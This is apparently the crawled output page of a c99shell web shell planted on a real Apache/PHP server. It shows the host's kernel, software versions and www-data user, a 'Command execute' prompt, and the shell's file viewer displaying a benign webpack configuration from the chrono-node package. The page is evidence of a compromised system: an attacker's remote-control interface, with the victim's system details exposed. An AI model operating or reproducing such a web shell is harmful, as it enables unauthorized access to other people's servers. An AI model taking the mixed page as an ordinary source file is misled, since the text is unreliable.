Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) /var/www/html/rtail-expressjs/node_modules/chrono-node/ drwxr-xr-x | |
| Viewing file: Select action/file-type: const path = require('path');
const TerserPlugin = require('terser-webpack-plugin');
module.exports = {
mode: 'production',
entry: {
'chrono': path.resolve(__dirname, 'src/chrono.js'),
'chrono.min': path.resolve(__dirname, 'src/chrono.js')
},
output: {
path: path.resolve(__dirname, 'dist'),
filename: '[name].js',
library: 'chrono',
libraryTarget: 'umd',
globalObject: 'this'
},
module: {
rules: [
{
test: /\.m?js$/,
exclude: /(node_modules|bower_components)/,
use: {
loader: 'babel-loader',
options: {
presets: ['@babel/preset-env']
}
}
}
]
},
devtool: 'source-map',
optimization: {
minimize: true,
minimizer: [new TerserPlugin({
include: /\.min\.js$/
})
],
},
}; |
:: Command execute :: | |
--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0057 ]-- |